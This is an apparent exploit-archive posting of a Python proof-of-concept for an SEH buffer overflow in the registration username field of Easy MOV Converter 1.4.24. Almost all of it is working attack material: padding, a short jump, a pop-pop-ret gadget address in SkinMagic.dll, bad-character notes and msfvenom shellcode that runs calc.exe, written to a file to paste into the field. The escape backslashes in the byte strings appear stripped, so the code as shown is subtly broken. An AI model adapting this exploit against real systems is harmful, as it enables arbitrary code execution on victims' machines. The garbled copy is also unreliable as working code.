Easy MOV Converter 1.4.24 Buffer Overflow
Posted on 15 June 2017
#!/usr/bin/python ############################################################################### # Exploit Title: Easy MOV Converter 1.4.24 - 'Enter User Name' Field Buffer Overflow (SEH) # Date: 13-06-2017 # Exploit Author: @abatchy17 -- www.abatchy.com # Vulnerable Software: Easy MOV Converter # Vendor Homepage: http://www.divxtodvd.net/ # Version: 1.4.24 # Software Link: http://www.divxtodvd.net/easy_mov_converter.exe # Tested On: Windows 7 SP1 32bit # # Special thanks to @t_tot3s for pointing out how stupid I am. Credit to Muhann4d for discovering the PoC (41911). # # To reproduce the exploit: # 1. Click Register # 2. In the "Enter User Name" field, paste the content of exploit.txt # ############################################################################## # If you're using WinXP SP3, change this to 996 buffer = "x41" * 1008 nSEH = "xebx10x90x90" # 0x1001145c : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1 (C:Program FilesEasy MOV ConverterSkinMagic.dll) SEH = "x5cx14x01x10" badchars = "x00x0ax0d" # and 0x80 to 0xff # msfvenom -p windows/exec CMD=calc.exe -b "x00x0ax0d" -f python buf = "" buf += "xdaxd7xd9x74x24xf4xbax07xc8xf9x11x5ex2b" buf += "xc9xb1x31x31x56x18x03x56x18x83xeexfbx2a" buf += "x0cxedxebx29xefx0exebx4dx79xebxdax4dx1d" buf += "x7fx4cx7ex55x2dx60xf5x3bxc6xf3x7bx94xe9" buf += "xb4x36xc2xc4x45x6ax36x46xc5x71x6bxa8xf4" buf += "xb9x7exa9x31xa7x73xfbxeaxa3x26xecx9fxfe" buf += "xfax87xd3xefx7ax7bxa3x0exaax2axb8x48x6c" buf += "xccx6dxe1x25xd6x72xccxfcx6dx40xbaxfexa7" buf += "x99x43xacx89x16xb6xacxcex90x29xdbx26xe3" buf += "xd4xdcxfcx9ex02x68xe7x38xc0xcaxc3xb9x05" buf += "x8cx80xb5xe2xdaxcfxd9xf5x0fx64xe5x7exae" buf += "xabx6cxc4x95x6fx35x9exb4x36x93x71xc8x29" buf += "x7cx2dx6cx21x90x3ax1dx68xfexbdx93x16x4c" buf += "xbdxabx18xe0xd6x9ax93x6fxa0x22x76xd4x5e" buf += "x69xdbx7cxf7x34x89x3dx9axc6x67x01xa3x44" buf += "x82xf9x50x54xe7xfcx1dxd2x1bx8cx0exb7x1b" buf += "x23x2ex92x7fxa2xbcx7exaex41x45xe4xae" junk = "x90" * 16 badchars = "x0ax0d" data = buffer + nSEH + SEH + junk + buf f = open ("exploit.txt", "w") f.write(data) f.close()